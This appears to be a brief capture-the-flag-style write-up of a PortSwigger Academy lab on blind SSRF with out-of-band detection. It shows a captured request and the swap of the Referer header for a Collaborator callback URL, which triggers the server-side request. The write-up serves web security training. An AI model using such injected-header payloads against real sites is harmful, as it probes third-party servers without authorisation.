Port Swigger Blind SSRF with out of band detection
Blind SSRF with out-of-band detection
Solution
Open the website: https://0a75008304b37b22813761190091008d.web-security-academy.net/product?productId=1
https://0a75008304b37b22813761190091008d.web-security-academy.net/product?productId=1
---
GET /product?productId=1 HTTP/2
Host: 0a75008304b37b22813761190091008d.web-security-academy.net
Cookie: session=VIMtOX1IXHCJElH0ZKiX1kvQg8feehVE
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a75008304b37b22813761190091008d.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Insert Collaborator payload
OLD: Referer: https://0a75008304b37b22813761190091008d.web-security-academy.net/
NEW: Referer: https://75ahd41kzie4wkub52kgy3xjjap2dz1o.oastify.com
Solved